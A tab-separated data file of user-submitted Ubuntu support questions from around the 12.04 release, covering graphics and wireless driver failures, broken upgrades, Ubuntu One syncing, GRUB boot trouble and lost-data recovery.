127989	no acpi support for my pc , what can i do ?	on my new pc something is wrong with acpi support under linux . i have to boot it with acpi=off and nolapic . also it detects only one cpu core ( this annoys me the most ) and wo n't shut down completely , i have to hold power button for few seconds to power pc off . the question is : what can i do ? edit some config files ? report bugs ? send mails to motherboard manufacturer ? run some utility to help reverse-engineer drivers ? ( currently i just turn amd c1e off in bios . it 's a nice workaround . ) my configuration : ubuntu 12.04 ( upgraded from 11.10 ) processor amd fx ( tm ) -4100 quad-core ram 8,00 gb graphic gigabyte gv-n56goc-1gi ( nvidia geforce gtx 560 ) mainboard gigabyte ga-870a-usb3 disk ata ocz-agility3 ( ssd )
127993	how do you get permission to save rcs after setting utc=no ?	i am a first time user of ubuntu . i have installed ubuntu 12.04 dual boot with windows . ubuntu is screwing up the windows clock . i looked this up and found the following lines to use : gedit /etc/default/rcs ( in terminal ) utc=no ( in edit tool ) however , the rcs file will not save . the editing tool wo n't let me to save it . the editing program says i do not have permission . i am a noob . if there is a clear guide on how to get permission to edit and save rcs , step by step with actual command lines if possible , please direct me to it . if there is a very quick way to get permission to edit this file prior to editing , please let me know .
127994	ca n't install ubuntu on amd athlon xp 2100 with msi graphics card	i have tried installing ubuntu several times and it always ends in abject failure . persistent idiot that i am , i 'm trying again . this is ubuntu 12.04 lts and it starts with the image on the monitor dancing about and finishes with it looking like an elderly television set with part of the picture from one side appearing at the other and the happy dancing lines . it complements this funky image with the legend `` installation failed '' . is it time for me to give up and just use windows or is there something simple i could do to make it better . please do n't offer suggestions like `` go to this kernel or that '' , because i 've never got that far and kernels are just things other people have . apart from that i 'd be very grateful for any help or advice . edit to expand i have now tried using an alternative and got to this , '' failed to install the base system the base system installation into /target / failed . check /var / log / syslog or see virtual console 4 for the details . how would i do that ? i should just give that nice man gates my money should n't i ? this linux thing is a big practical joke is n't it like a rick roll only more frustrating ?
128016	kubuntu upgrade from 11.10 to 12.04	i tried to update as described here : https : //help.ubuntu.com/community/preciseupgrades/kubuntu . but after updating all packages with muon-updater no upgrade available message pops up as described there . check for updates is enabled in the systemsettings . any ideas what could be wrong or how do i upgrade on the commandline ? i do not remember any errors when doing the muon update . and i get : ~ > sudo do-release-upgrade auf neue ubuntu-freigabe pr端fen keine neue freigabe gefunden ( in german ; means no update available ) but : ~ > cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 ''
128017	why do games lag in unity and not in unity 2d ?	ubuntu 12.04 : all games lag in unity , but in unity 2d games do n't lag . does anyone have a solution that it do n't lag in normal unity ? processor : intel® core™2 duo cpu e8500 @ 3.16ghz × 2 memory : 3,9 gib graphics : geforce gtx 460 ubuntu 12.04 32-bit fresh installed ( before 11.10 32-bit all have worked ) driver : nvidias accelerated video card driver ( version current-updates ) games : neverball , beep , volley brawl ( offline ) under 11.10 all games worked fine
128018	12.04 : problems with radeon 2100 and unity3d	with 11.10 i can use unity 3d without problems , but with the upgrade to 12.04 ubuntu only uses unity2d . i installed the free drivers for radeon , force the use of unity3d and now it almost `` works '' ... but now i have this problem : i tried to modify compiz settings but , everything is as bad as default ... my specs are : ubuntu amd64 11.04 . clean install . ati radeon 2100 lspci -nn | grep vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati radeon 2100 [ 1002:796e ] $ /usr/lib/nux/unity_support_test -p opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rs740 opengl version string : 2.1 mesa 8.1-devel ( git-6af4c90 precise-oibaf-ppa ) not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
128019	ubuntu one slow download sync speed	i am having problems syncing my ubuntu one files with my ubuntu 12.04 fresh installation . everything went well during the setup phase . now , i am trying to sync back in my folders in my u1 account and the transfer speed is extremely slow . i am averaging a 15kb/s transfer speed . i tried uninstalling ubuntuone-client and reinstalling it . it did not fixed the problem . right now u1 is stuck downloading a 50mb file . it is taking forever . any ideas ? speed test : http : //speedtest.net/result/1922664547.png screenshot : http : //postimage.org/image/obs3f410z/
128023	how do i configure the touchpad so that the cursor does n't move when i click ?	just installed 12.04 lts and i experience some problems with my touchpad . everytime i tap/double tap , the cursor is moving around ( not static as should be ) . for example if i want to close a window , i click on `` x '' button from touchpad , the cursor is moving and not always hit the `` x '' button . touchpad buttons left click , right click are working well , but tap not . did u guys experience the same problem ? is there something related to sensitivity ? how to fix it ? ps : on ubuntu 11.10 did n't had this issue
128024	wireless connection is lost periodically and without apparent reason and is quickly reestablished on a bcm4312	my wireless connection has lost stability after i upgraded from ubuntu 11.10 to ubuntu 12.04 . it used to remain connected for as long as there was signal , but now i get periodic disconnects which appear very random and without a defined cause . i have attached an image ( below ) of a signal graph ( graphed by iwscanner ) which shows how signal is relatively stable but it is somehow lost momentarily and quickly regained . you can see how there are short interruptions in the signal that cut the connection , which i assure you , are not caused by my router . my network card is a broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) , in case it is relevant . addendum i test information i had thought that the cause of this problem was either my network management application or the wireless card driver , so i decided to find out and tried the following configurations : wicd with my same wl driver . this does not fix the problem , the behavior stays the same . wicd with the b43 driver . with this configuration , i ca n't even connect to internet - wicd reads no networks in range . nm-applet with b43 driver . this does not fix the problem either . ( my original configuration was nm-applet with the wl driver ) also , i think the wl driver is also called sta . because of the outcome of this tests , i would conclude that the problem is not in the network management application nor in the driver . where else could it be ?
128026	is there a spotify repository that works for 12.04 ?	the spotify repository ( deb http : //repository.spotify.com stable non-free ) does n't work on ubuntu 12.04 ( download failed ) . does anyone have a solution to install spotify on ubuntu 12.04 ?
128028	wifi disabled for intel centrino wireless-n 1000 intel in 12.04	laptop model - hp- dm4 - 2070 . i had faced the same problem for wireless being disabled in case of 11.10 . it had to do with the new kernel . i thought with 12.04 this problem will be handled but the problem persists . is there no way to get the wireless working except for the way mentioned in the following link ? ? wifi for centrino wireless-n 1000 intel corporation ( hp pavillion dm4 - 2070us ) is not working output for sudo lshw -class network *-network unclaimed description : network controller product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : c2500000-c2501fff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : c0 serial : 2c:41:38:07 : f3 : e3 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.1.116 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:43 memory : c1400000-c143ffff ioport:2000 ( size=128 ) output for dmesg | grep iwl [ 14.742886 ] iwlwifi 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 14.742897 ] iwlwifi 0000:01:00.0 : setting latency timer to 64 [ 14.743013 ] iwlwifi 0000:01:00.0 : pci_resource_len = 0x00002000 [ 14.743016 ] iwlwifi 0000:01:00.0 : pci_resource_base = ffffc90000c78000 [ 14.743018 ] iwlwifi 0000:01:00.0 : hw revision id = 0x0 [ 14.743119 ] iwlwifi 0000:01:00.0 : irq 42 for msi/msi-x [ 14.743161 ] iwlwifi 0000:01:00.0 : detected intel ( r ) centrino ( r ) wireless-n 1000 bgn , rev=0x6c [ 14.743229 ] iwlwifi 0000:01:00.0 : l1 enabled ; disabling l0s [ 14.765147 ] iwlwifi 0000:01:00.0 : device eeprom ver=0x15d , calib=0x6 [ 14.765151 ] iwlwifi 0000:01:00.0 : device sku : 0x50 [ 14.765154 ] iwlwifi 0000:01:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 14.765907 ] iwlwifi 0000:01:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 14.912840 ] iwlwifi 0000:01:00.0 : request for firmware file 'iwlwifi-1000-5.ucode ' failed . [ 14.914254 ] iwlwifi 0000:01:00.0 : request for firmware file 'iwlwifi-1000-4.ucode ' failed . [ 14.915718 ] iwlwifi 0000:01:00.0 : request for firmware file 'iwlwifi-1000-3.ucode ' failed . [ 14.916986 ] iwlwifi 0000:01:00.0 : request for firmware file 'iwlwifi-1000-2.ucode ' failed . [ 14.919391 ] iwlwifi 0000:01:00.0 : request for firmware file 'iwlwifi-1000-1.ucode ' failed . [ 14.919445 ] iwlwifi 0000:01:00.0 : no suitable firmware found ! [ 14.919783 ] iwlwifi 0000:01:00.0 : pci int a disabled [ 2868.960807 ] modules linked in : snd_hda_codec_hdmi snd_hda_codec_idt rfcomm bnep bluetooth parport_pc ppdev binfmt_misc hid_logitech_dj usbhid hid joydev snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq hp_wmi sparse_keymap hp_accel lis3lv02d input_polldev snd_timer snd_seq_device wmi iwlwifi snd mac80211 i915 cfg80211 rts_pstor ( c ) drm_kms_helper drm uvcvideo videodev psmouse soundcore mei ( c ) v4l2_compat_ioctl32 mac_hid serio_raw snd_page_alloc i2c_algo_bit video lp parport atl1c
128030	flash player not loading in firefox or chromium	i am brand new to linux so can you ( try ) to keep answers as simple as possible . a few days ago i did a fresh install of ubuntu 11.10 on an old computer ( just under 500mb of ram ) and once i had completed the install . i installed the restricted extras thingy . i then tried to load up a flash video in firefox but it failed : all it would show is a blank box where the video should have been . at this point i tried various different video sites ( iplayer , youtube , etc ) and i even tried opening up a downloaded flash game in firefox but still i was just getting a blank box where the flash content should have been . next i tried doing a fresh install of ubuntu 12.04 32bit , installing the restricted extras thingy again but it still just showed up the blank box . finally i tried various different methods for getting it to work including : trying a different browser~ same issue trying different websites~ same issue reinstalling the flash plugin via the software center~ same issue reinstalling the flash plugin via the adobe website~ same issue installing flash-aid ( a plugin designed to solve any issues with flash ) ~ same issue disabling the flash plugin for firefox~ flash was no longer detected so the websites told me that i needed to install the flash plugin to play the content not really sure what else to try ? ? ?
128036	how to run `` firefox -profilemanager '' with unity ?	i 'm trying to find a way to edit the command that runs firefox to just add `` -profilemanager '' to it , but ca n't find anyway on how to do it on unity launcher or dash .
128040	how to recover my data ?	it happened to me that while upgrading to ubuntu 12.04 , i made instead aptitude dist upgrade . i downloaded the iso version for a from-zero installation . in the partition definition i choosed that my home partition to remain as my home , but i assumed wrongly that if i choose ext4 instead ext3 , a reformat would happen without losing my data . the installation completed 'successfully ' , except that i lost 100 gb of my precious music collection , documents and so on . is there a way to recover my life ( my music ) , considering that i have not done anything over disk after installation ?
128043	broadcom 4313 does n't work following 12.04 upgrade	i have an hp g62-228ca laptop with a bcm4313 previously running ubuntu 11.10 . i ran the 12.04 upgrade last night without much thought . following the upgrade and mandatory reboot , the wireless card no longer shows up in the network manager , the first time i 've had any kind of issues with wireless under ubuntu . i 've done much googling on the issue but so far i have n't found a permanent solution . mucking around with some packages though ( i 've installed five different ones or so ) , i 've managed to devise a workaround that i must run every time i boot the laptop . i have to remove the broadcom sta driver and reinstall it . inspiration taken from here : wifi does not work , broadcom sta wireless driver does not work on a bcm4313 after the second modprobe command , the wireless reappears in the network manager and ten seconds after that i 'm back on the wifi . if anyone can provide some advice on how to fix this permanently i will be extremely grateful . i 'd rather not roll back to 11.10 or reinstall , but i will if i need to . just let me know if you need the output from any terminal commands . thanks in advance !
128044	how do you install new themes in ubuntu 12.04 ?	in previous versions of ubuntu you have been able to install new themes by going to the `` appearance '' menu . it seems you can no longer do this in the 12.04 update .
128046	upgrade with nvidia graphics card causes continued issues . should i remove the card for good ?	i 've been a follower of ubuntu for several years now and i 've continually had issues upgrading ( mostly major upgrades ) due to the reboot issues that arise when an nvidia card/driver has been installed ( evga geforce 9500 gt ) . i usually have to resort to a complete re-install to get everything working . my last upgrade was an accidental upgrade ( doh ! ) , as i did n't pay attention to what i was upgrading ( 110+ packages ) . my typical solution has been to remove the graphics card ( switching to my motherboard 's graphics ) and change the boot type to some mode that will allow me to get to the command line . then i move the /etc/x11/xorg.conf to reset things . mv /etc/x11/xorg.conf /etc/x11/xorg.conf.bak this will usually allow me to boot and login with decent graphics , but not with all the fancy graphics perks ( unity ) . i really do n't care about all of the fancy visual effects with ubuntu 11/12 provides . i just want something that works , which is why i moved to ubuntu in the first place . i prefer simplicity and things that just work . should i remove the nvidia graphics card for good this time ? is there a better alternative graphics card that i should get ?
128049	ubuntuone syncing really slow	i had my documents folder synced in 11.10 . i erased my harddisk before installing 12.04 . i then set up u1 the same way and waited to get my files transferred to my hdd . it 's really slow and i neither see some kind of progress bar or percentage shown nor do i know the exact speed of the download . i do n't have a slow connection here . is this normal ?
128052	is there a single app that allows for quick searching , viewing , and editing of text files ?	i have a large ( thousands ) collection of notes stored on my drive as text files and synced to my other computers via ubuntuone . currently i use grep to search for the file i want , nautilus to open it , and gedit to edit it . is there a single app i can use that will allow me to do all three at once ? i used to use evernote , but their text editors are so crappy i had to dump it . i also used tomboy for a long time , but the lack of a web based editor and no android based editor either was a showstopper .
128053	crashplan and samba printing problems after upgrade to 12.04	i upgraded from 11.10 to 12.04 ( 64bit ) . after the upgrade crashplan no longer works . it gives an error of getting `` disconnected from the backup engine '' . backups no longer take place . i also had a canon ip4600 attached to my ubuntu computer that i was sharing via samba . now printjobs get stuck in the queue , processing forever . all these things worked fine in 11.10 . i then did a clean install of 12.04 , but no change . i searched everywhere but can not find solutions to these problems . i conclude that these must be bugs in 12.04 .
128055	broken held back packages	since i upgraded to precise 12.04 , i 've been having troubles with unity3d , as my graphics card drivers do n't seem to work . i 've tried reinstalling them , downgrading them , and reinstalling unity . whenever i try to do so , it wo n't let me , saying : the following packages have unmet dependencies : gnome-tweak-tool : depends : gnome-shell but it is not going to be installed e : unable to correct problems , you have held broken packages . does anyone know how to solve the broken packages problem ? i 've looked everywhere and i 'm desperate . thank you for your attention .
128056	long passphrase for login and short password for screensaver	the situation is that : for the encrypted home directory , any passphrase less than 10 characters is useless at all . if someone physically get the harddisk , the data and the other sensitive password stored in keyring can be leaked as a cracking machine can attempt trillion passwords per second . so i prefer a long passphrase , which typed only once a day . for the use of a laptop , however , the screensaver can be triggered very often and it sleeps sometimes in which entering long password just waste time . in this situation , fast password attempts is not possible . i just dont want random guy touch it , so i prefer a short password . also , a laptop is more likely to loss , so a stronger encrypted passphrase is even deserved . on the other hand , forgetting passphrase for login will loss all data so it changes rarely . in contrast , forgetting screensaver password makes no harm as it should be able to reset by relogin , so it encourages to change often . this is a typical usage pattern , so i want to set a different password for screensaver ? is there any programs to do that ? any script ? thanks edit i have tested the xscreensaver , and in the manual , it says : if you change your password after xscreensaver has been launched , it will continue using your old password to unlock the screen until xscreensaver is restarted . on some systems , it may accept both your old and new passwords . so i would think there is a way to use a different password .
128059	ubuntu 12.04 installation problems	i 'm having issues installing ubuntu 12.04 on my laptop . i downloaded the ubuntu 12.04 iso and made a bootable usb . the usb works fine on my desktop computer , but i have issues getting it to work on my laptop . on the laptop , the ubuntu screen comes up and it gives me options : run ubuntu from this usb install ubuntu on a hard disk test memory boot from first hard disk advanced options help if i select option 1 , a bunch of lines come up and then all i get is a black screen and it does nothing . when i select to install ubuntu , all i get is the black screen . i 've waited 5-10minutes and nothing happens . as i said , i have no issues running the same usb on my desktop . my laptop specs are : intel core i5-2410m ( 2.30ghz , dual-core ) 6gb ram 750gb hdd 7200rpm amd radeon hd 6630 1gb any ideas why this is happening ? note : both computers have windows 7 already installed on them .
128062	hiding files from dash search	i have images and videos that i want to have hidden from the files and videos lens searches in my dash . ( nothing dirty , just ponies : p ) anyway ... .is there a way to have a file or even a folder not show up ? would hiding the files or folders do the trick , or is there more that i need to do ?
128066	windows 8 boot failure since ubuntu 12.04 upgrade	i have had ubuntu 11.10 installed on my computer on one hard disk . on another disk , there is windows 8 consumer preview . i 've been able to dual-boot with my bios 's hdd selector . when i updated my ubuntu 11.10 to 12.04 , it included the new version of grub , which had an entry for windows 8 , as expected . however , whenever i try to boot into windows 8 , i can see the fish for a second or two and then a few lines of error code as follows : your computer needs to restart . please hold down the power button . error code : 0x00000050 parameters : 0xfffffab006800000 0x0000000000000000 0xfffff801d09b6c90 0x0000000000000002 can anyone help me chainload the windows mbr to grub correctly to avoid a boot problem , or suggest a new bootloader to replace ( or run along side of ) grub so i can boot windows 8 without problems ?
128070	ubuntu one does n't appear to be downloading ?	basically , my pc 's hard drive failed , so i 've now installed 12.04 on a new hard drive , and put it in . ubuntu one says that it has 200 files to download ( although , it seems odd that it 's exactly 200 ) and that it 's currently syncing . however , apart from the folders ( and a few files in the ubuntu one folder ) none of my files appear to be downloading/downloaded . e.g . if i look in my music folder all the folders are there , but there are no music files . in all , all the files it would have to download are about 3.2 gb . is there any way to make it start downloading ? i 've tried restarting , disconnecting , but to no avail . thank , jack : )
128071	how to change a dconf setting for customized live cd ?	i am creating a live cd for use in a kiosk/installation . the main reason is to prevent a conventional hard drive from becoming corrupted in an environment with lots of power interruptions -- in fact i can tell the staff there to simply flick off a light switch at the end of the day and feel confident that it will come back reliably in the morning . i am using uck to install the nvidia drivers , the application my team is creating , and the like . so far , all is working well , except for one thing : the screens turn off after 5 minutes . as i understand it , the system settings for all this are set by the default dconf profile . i ca n't just change the settings for the root user in the uck terminal ; user `` ubuntu '' is created from scratch on every boot . i need to change the default profile . i did some digging and found the dconf key that i want to provide a new default for is idle-delay . i tried to follow the instructions on the dconf wiki page , but it 's pretty confusing to me . i also tried to follow the instructions here for setting the idle-delay , without success . my question is : what are the correct files to create , and/or commands to run , to specify in the dconf db that every new user should start out with a profile that leaves the monitor on all day ? /org/gnome/desktop/session/idle-delay appears to be the key i want to set . thank you kindly !
128072	ati rs690m x1200 proprietary driver installation	i 've installed ubuntu 11.10 on my emachine e625 amd64 ( tf-20 ) with an ati rs690m x1200 graphics card but i did n't have 3d acceleration . the open-source driver works , except for any video effects or accelerationâś i 've downloaded the driver from ati and followed the installation instructions and here is the result : error : ./default_policy.sh does not support version default : v2 : x86_64 : lib32 : :none:3.0.0-17-generic ; make sure that the version is being correctly set by -- iscurrentdistro what did i do wrong ?
128077	make ubuntu only start if an usb flash drive is connected	this may sound weird , but i got this idea and i would love to put it in practice . i have an usb flash drive that i carry with me everytime , and i would like to create a system to make my ubuntu only start if that flash usb is connected , just like a key that turns on a car ( the login screen should appear only if the `` key '' is connected - i would have to put my password too ) . this will be a great improvement on my computer 's system ( and would also be kind of fun ) . it would be also nice to have more than one `` key '' , in case a flash drive gets broken ... so , the question is , is this possible ? if yes , how can i make it ?
128078	ubuntu 12.04 random freezes , please help	i have a problem . sometimes my ubuntu 12.04 freezes up , the desktop gets black , then you can see it again but ca n't control the mouse and unity 3d elements are missing sometimes . what can that be ? it occurs randomly , like when browsing the web . thanks
128081	voc monitor `` input not support '' on grub	when i boot my pc with both windows and ubuntu installed : i always get the exact message `` input not support '' without the -ed flashing on my voc monitor . grub does not show so i ca n't reach windows . i have tried blindly pressing the `` down '' key and `` enter '' but it yields no response . i have an nvidia card with the extra 3d graphics driver applied also . additional comment : same here . sshd is running , i can log into the system remotely from another pc , everything is working fine ; just i ca n't see anything on the monitor that is directly attached . i guess somewhere within grub configuration there must be something to set the video output resolution , but where ? ? ?
128084	broadcom sta update broke wifi	i have the bcm43225 chip in my acer aspire one netbook running 12.04 32-bit . my wireless had been working just fine ( with the exception of enterprise networks not being able to connect to the internet ... but that is another story ) until i updated the broadcom sta wireless driver a couple days ago . ever since , the wireless will randomly disconnect from the network ever half hour or so and take around a minute or two to reconnect . any ideas what is going on ? thanks !
128086	upgrade 11.10 to 12.04 , no applications in launcher , no shutdown menu	my unity crashed during the update from 11.10 to 12.04 , and after waiting a long time i was forced to restart the computer . when it came up , things were in a sorry state , i got to the terminal and ran sudo dpkg -- configure -a and it seemed the update resumed . after a reboot , everything seemed ok , except when going to the applications launcher , there a search bar for applications , but no filter results button , and searching for apps yields no results . there are also error messages that pop up about the unity application lens having a serious issue .
128088	chrome double title bar -looking weird-	when i open a chrome window , its like the browser 's got a built-in top bar with the max , min , and close buttons . problem is , on top of that bar , i 've got the ubuntu regular topbar , with three other max , min and close buttons ! same thing when you maximize the window . ( only , of course , when you get the pointer on the unity top bar , that 's when you get the ubuntu bar to show the three other buttons ) . looks like something 's not right
128089	how to update kernel to version 3.3.4 ?	olรก pessoal , baixei o kernel do linux `` linux-3.3.4.tar.bz2 '' e quero pode atualizar o kernel atual versรฃo `` 3.2.0-24-generic '' para 3.3.4 no meu ubuntu 12.04 passo a passo , por favor ! agradeรงo desse de jรก . i downloaded the linux kernel linux-3.3.4.tar.bz2 and i want to update my current kernel 3.2.0-24-generic to it in my new ubuntu 12.04 . can you give me step by step instructions ?
128090	hud wo n't work on 12.04	i upgraded to 12.04 right after it was released , and once it installed , i was eager to try the new features . after fiddling around with most of them , i forgot to try the brand new hud . i tapped the alt key ... and nothing happened . i searched around to see if i disabled it , but i did n't . also , holding alt still showed the appmenu at the top . is there a reason that it is n't working on my computer ?
128098	do i have to remove open drivers to switch to fglrx ?	do i have to uninstall open source drivers which are in ubuntu by default before installing fglrx ?
128099	restore speakers / headphones option	when i plug my headphones in after upgrading to ubuntu 12.04 , it no longer mutes by speakers , and i also do not have a headphones output as i did previously . i recall having to go into a conf file and disable front panel audio or something like that ; and everything began to work fine . i have an hp dv6 . is there anyway to see what my alsa-base.conf was before the upgrade ?
128100	how to add a video and music folder to xbmc	i have a video folder and a music folder and i want to add them both to xbmc . both folders have several sub-folders that contain many songs or many videos . i tried importing the list and selecting the video folder in the video category in xbmc with no luck . how can i import this folders to xbmc . a easy to follow guide would be good .
128105	my laptop is locked with optimus virtualbox	when i released optimus crashed virtualbox with the laptop and could not move the mouse , i had to turn it off completely , what happens ? only once has blocked me , but i can go several times in the future . thank you , greetings .
128106	can i use ubuntu to recover files from an old system	i wondered if it was possible to download ubuntu and create a bootable cd which i can then take to an old system , which is n't booting properly in windows xp and run ubuntu to again access to data on that older machine ... any help ?
128107	how can i only load up the terminal via grub then upgrade	so after the upgrade i made last night i ca n't load up the gui properly . i have a feeling the upgrade died half way through . grub is working . all the kernals are listed . that being said how can i : a ) make grub load into terminal only . no gui . b ) how can i reinstall gnome ? c ) how can i try to install the upgrade for ubuntu again ? it may or may not let me `` do-release-upgrade '' . so what are my options here ? thanks !
128108	fan working non-stop on a dell inspiron 5110	first of all i 'm new at ubuntu . i 've only tried 11.10 before 12.04 . since then my notebook 's ( dell insprion 5110 ) fan was working non-stop . and also battery lasts in 2 hours . so i made a research . some said it 's about graphics card driver . i 've tried so many things , so many codes but i get no result . i must say that i 've tried ironhide and bumblebee . non of them worked 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev ff )
128113	how do you remove nvidia 's proprietary drivers ?	i always seem to have grief with nvidia drivers and have often had to re-install ubuntu : is there a better way to remove them ? when i first installed the drivers , the display came up on 640 by 480 . i managed to set 2 screens to 1024 by 780 which was usable , but then ubuntu recommended installing proprietary drivers ( nvidia-current-updates 295.40-ubuntu1 ) . after doing this and re-booting it shows laptop and offers only 640 by 480 on a single screen . is there any way to revert to the original driver ? is there any way to find out if the new drivers work before installing them ? - for years i have been hoping that it would be all fixed in the latest releaseâś i always seem to fall for this !
128116	wireless connection slow on a dell studio with an intel centrino n 1000	i have a dell studio , and just installed via cd the 12.04 lts version . the problem is that the wireless connection is ultra slow , and that did n't happen with 11.04 or windows 7 . how can i fix it ? any idea ? thanks in advance
128118	canon mg5320 not recognized by simple scan ( prints fine )	displays 'no scanners detected ' 'please check if connected and power on'
128124	changing update manager settings via terminal	i was using 11.04 . i had my update manager set to notify me of lts releases by ubuntu . so when i tried to upgrade via terminal ( by do-release-upgrade ) , it said no new version was found . so i had to go to update manager via nx viewer and change the setting to notify me of all the releases . then when i did the 'do-release-upgrade ' , it started upgrading to 11.10 . my questions are : ( 1 ) how could i have changed the version upgrade notification via terminal ? ( 2 ) i disabled system upgrade notification unless it was lts . should not 'do-release-upgrade ' be able to find any new upgrade on its own irrespective of the choice of notification . thanks .
128125	does ubuntu 12.04 32-bit detect more than 4gb of ram ?	i am having some issues with 64-bit and while i find it very good i will move back to 32-bit for at least a month until all the minor 64-bit issues in 12.04 are dealt with . my only question right now is whether 32-bit version of ubuntu 12.04 detects/supports more than 4 gb of ram .
128126	deja dup : volume does n't implement mount	i am using deja dup for about two-three months and a week ago i started getting this error message and no backup was made : backup failed volume does n't implement mount is there something wrong with my hdd ? using ubuntu 11.10 on my asus laptop ( x53sj ) . thank you for your time !
128128	how to boot without 'nomodeset ' ?	i installed ubuntu 12.04 on my laptop , and am now trying to get it to run . in the grub menu , if i load it normally , all i get is a black screen . in order for it to boot successfully , i have to edit the menu item and add 'nomodeset ' . with this , ubuntu boots up . is there a fix for this , so that i do n't have to constantly add the nomodeset ? i tried to install the proprietary drivers but i still had the same problem . my laptop specs are : intel core i5-2410m ( 2.30ghz , dual-core ) 6gb ram 750gb hdd 7200rpm amd radeon hd 6630 1gb
128135	upgraded from 10.10 to 12.04 . how can i remove any remnants of settings of gnome ?	i formatted / but i used my old home folder . i am seeing some strange behaviours in unity that i am guessing that may be because of configuration files from gnome 2 ( that i was using in 10.10 ) . could this be happening ? if i deleted several folders in my home , like .compiz , could i make sure there were not remnants of gnome and if yes , which folders would they be ? thanks for any help !
128136	secondary screen looks like tv with bad signal and	my secondary screen looks like a tv with a bad signal , the screen is a bit snowy . i do n't know how to describe it in my own language , so in english its even harder . beside the flickring the screens turns black every x amount of seconds and the screens shows a text 'no signal ' . most of the times when this happen the application that i 'm using currently crashes . this behaviour started today , before today it works all fine . i had never this problems with 11.10 . i have an ati radeon hd 5xxx and i 'm using 12.04 . it began when i had default drivers installed . but when i installed ati propariety drivers the problem remains .
128138	video playing is slow on 12.04	i started using ubuntu a very short time ago , and it was working perfectly ! i upgraded to 12.04 yesterday , and today i realize that everything is running slow . for example , video streaming online , from sites such as youtube is not working correctly , audio and video breaks constantly . i have a 64 bit system , with a intel® core™2 duo , 2.10ghz × 2 . i do n't know what more to add . i tried free -m on the terminal , it returned that i had only 524mb free from 3858mb . all that i have running at this point is mozilla firefox .
128139	eclipse/java integration not working after ubuntu 12.04 upgrade	i upgraded to ubuntu 12.04 this morning . after the upgrade i fired up eclipse and noticed that it was lacking java integration : java perspectives were gone , the option to create a new java project was missing , the menu item to build existing java projects was grayed out , etc . everything was working fine before upgrading . : ~ $ echo $ java_home /usr/lib/jvm/default-java : ~ $ which java /usr/bin/java if i can provide any additional helpful info , please let me know . i 'm still relatively new to the linux/java world , so thanks in advance for the help .
128142	how do i install and use awesome wm ?	how do i use awesome wm with ubuntu 12.04 ? how do i invoke awesome instead of unity ? any dangers to trying to install it - in other words can i mess up my graphical shell ?
128144	so i tried to upgrade from 10.04 to 12.04 , and now i 'm at the command line in recovery mode . what can i do ?	i first made sure i had installed all available upgrades for 10.04 , and checked that my update manager settings were right for showing the 12.04 upgrade , but i did n't see it . ( i did this yesterday . ) so i did a quick google and found this page , and ran update-manager -d from the command line . it went through the download , started installing , and at this point i wanted to make sure i did n't have any other processes running so i opened the system monitor from the taskbar , as well as a terminal . these opened , but i noticed that the windows no longer had the minimize-maximize-close buttons , and moreover i could n't close them from the bar at the bottom . nor at this point was i able to switch between desktops . the install proceeded until it came to a console prompt . i tried responding with the default ( i.e. , 'n ' keyboard input ) but the console did n't take the input ; it was unresponsive . so i restarted the computer and the bootup procedure ( from grub , only 10.04 is shown in the menu ) appeared to hang on the low-res screen 'ubuntu ' and the 5 progress dots . so i 've restarted and gotten to the command line in recovery mode . what to do now ? : ( nb gcc 4.6.3 is installed so i know the installation got at least that far .
128153	how do i get my linksys wusb300n wireless adapter working ?	i have an older dell dimension 4550 on which i did a fresh install of 12.04 from 10.04 . my wireless used to work fine with my linksys wusb300n , but it does n't any more . no proprietary drivers were suggested for download by ubuntu . so i found and downloaded a driver from linkys ' website and extracted it in my downloads folder : it is a .exe executable file . what should i do next ?
128156	simple program like ratmenu/9menu that can use images as menu items	i 'd like to be able to select an album by looking through album covers and launch any mp3 player on it or select an image album by scrolling through sample thumbnails and launch any image viewer on it .
128157	ati radeon 5650m fglrx black screen ubuntu ( all versions )	i 'm trying to install amd radeon hd drivers for my ati 5650m/intel but every time i boot it it does n't work . my screen is black and i need to remove the fglrx driver section from xorg.conf . i 've checked some forums but hasnt found that my card is compatible with linux drivers . sorry for my english . my system is : hp dv7 17.3 laptop i5 450 2.4 ghz 6gb ram ubuntu 12.04 64bit thanks .
128160	trying to boot from usb	i have similar issues but none with the 12.04 build . im trying this on a dell d610 laptop with a bad hard drive and was told i could just directly boot from the usb drive . im using an 8g usb drive and i have tried using the uui tool and get this message . syslinux 4.06 edd 4.06-pre1 copyright ( c ) 1994-2011 h.peter anvinet al error : no configuration file found no default or ui configuration directive found ! then i tried using unetbootin and got the bootup screen with only the default option and it would say auto boot with a 10 sec countdown and start over again . i do have the boot sequence for usb first .
